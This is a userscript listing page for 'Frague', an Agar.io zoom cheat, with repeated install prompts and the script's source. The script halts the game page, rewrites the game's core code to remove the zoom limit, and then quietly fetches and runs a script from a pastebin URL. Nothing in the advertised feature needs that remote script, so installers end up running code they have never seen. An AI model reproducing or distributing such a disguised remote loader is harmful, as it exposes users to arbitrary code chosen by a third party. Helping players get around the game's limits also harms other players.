Frague

Agar.io Hile Extra Zoom

K instalaci tototo skriptu si budete muset nainstalovat rozšíření jako Tampermonkey, Greasemonkey nebo Violentmonkey.

You will need to install an extension such as Tampermonkey to install this script.

K instalaci tohoto skriptu si budete muset nainstalovat rozšíření jako Tampermonkey nebo Violentmonkey.

K instalaci tohoto skriptu si budete muset nainstalovat rozšíření jako Tampermonkey nebo Userscripts.

You will need to install an extension such as Tampermonkey to install this script.

K instalaci tohoto skriptu si budete muset nainstalovat manažer uživatelských skriptů.

(Už mám manažer uživatelských skriptů, nechte mě ho nainstalovat!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(Už mám manažer uživatelských stylů, nechte mě ho nainstalovat!)

// ==UserScript==
// @name        Frague
// @namespace   Extension for agar.io + Zoom
// @description Agar.io Hile Extra Zoom
// @author      Emre
// @include     http://agar.io/*
// @include     https://agar.io/*
// @grant       GM_xmlhttpRequest
// @version     1.1.2
// @grant       none
// ==/UserScript==

window.stop();
document.documentElement.innerHTML = null;
var coreScript = '', mainDoc = '';
GM_xmlhttpRequest({
        method : "GET",
        url : 'http://agar.io/agario.core.js',
        onload : function(event) {
            coreScript = event.responseText;
            coreScript = coreScript.replace(/d=d<1\.0\?1\.0:d;/i, '');
             GM_xmlhttpRequest({
                 method : "GET",
                 url : 'http://agar.io/',
                 onload : function(event) {
                     mainDoc = event.responseText;
                     mainDoc = mainDoc.replace(/<script src="agario\.core\.js" async><\/script>/i, '<script>'+coreScript+'</script>');;
                     document.open();
                     document.write(mainDoc);
                    document.close();
                    var itv = setInterval(function(){
                      if($.length){
                          clearInterval(itv);
                          $['getScript']('//pastebin.com//raw.php?i=TwzPb29Y');
                      }
                    }, 500);
                 }
             });
        }
});